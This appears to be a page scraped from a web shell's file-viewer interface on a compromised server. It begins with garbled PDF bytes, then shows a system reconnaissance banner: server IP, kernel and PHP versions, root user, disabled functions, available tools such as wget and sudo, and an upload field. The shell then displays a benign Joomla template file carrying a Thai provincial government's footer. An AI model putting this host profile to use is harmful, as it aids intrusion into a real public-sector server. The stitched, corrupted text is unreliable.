%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 49.231.201.246 / Your IP : 216.73.216.149 Web Server : Apache/2.4.18 (Ubuntu) System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 User : root ( 0) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/old/templates/sj_flatnews/includes/lib/ |
Upload File : |
<?php /* * ------------------------------------------------------------------------ * Copyright (C) 2009 - 2012 The YouTech JSC. All Rights Reserved. * @license - GNU/GPL, http://www.gnu.org/licenses/gpl.html * Author: The YouTech JSC * Websites: http://www.smartaddons.com - http://www.cmsportal.net * ------------------------------------------------------------------------ */ /**** For each template, if there are special cases you can override the function here ***/ class YtTemplate extends YtFrameworkTemplate { // Get Copyright Template /* Render as mod_footer */ function getCopyright(){ $app = JFactory::getApplication(); $date = JFactory::getDate(); $cur_year = $date->format('Y'); $csite_name = $app->getCfg('sitename'); if (JString::strpos(JText :: _('MOD_FOOTER_LINE1'), '%date%')) { $line1 = str_replace('%date%', $cur_year, JText :: _('MOD_FOOTER_LINE1')); } else { $line1 = JText :: _('MOD_FOOTER_LINE1'); } if (JString::strpos($line1, '%sitename%')) { $lineone = str_replace('%sitename%', $csite_name, $line1); } else { $lineone = $line1; } ?><div class="ppaofooter"><a href="http://www.ppao.go.th"><img src="images/logo50.png" border="0" width="50" height="50" style="border: 0; float: left; margin-right: 10px;" /></a><a href="http://www.ppao.go.th">องค์การบริหารส่วนจังหวัดพิษณุโลก</a> ถนน พิษณุโลก - วังทอง ตำบลสมอแข อำเภอเมืองพิษณุโลก จังหวัดพิษณุโลก 65000 โทรศัพท์. 0 5522 3718 - 20 โทรสาร. 0 5522 3718 - 20 ต่อ 400</div> <div> <div class="ppaofooter"><a href="http://www.ppao.go.th">Phitsanulok Provincial Administrative Organization</a>, Phitsanulok - Wangthong Road, Samokhae sub-district, Mueang Phitsanulok district, Phitsanulok province, 65000</div> <div>Tel. +66 5522 3718 / 19 / 20 Fax. +66 5522 3718 / 19 / 20 Ext. 400</div> </div> <?php } } ?>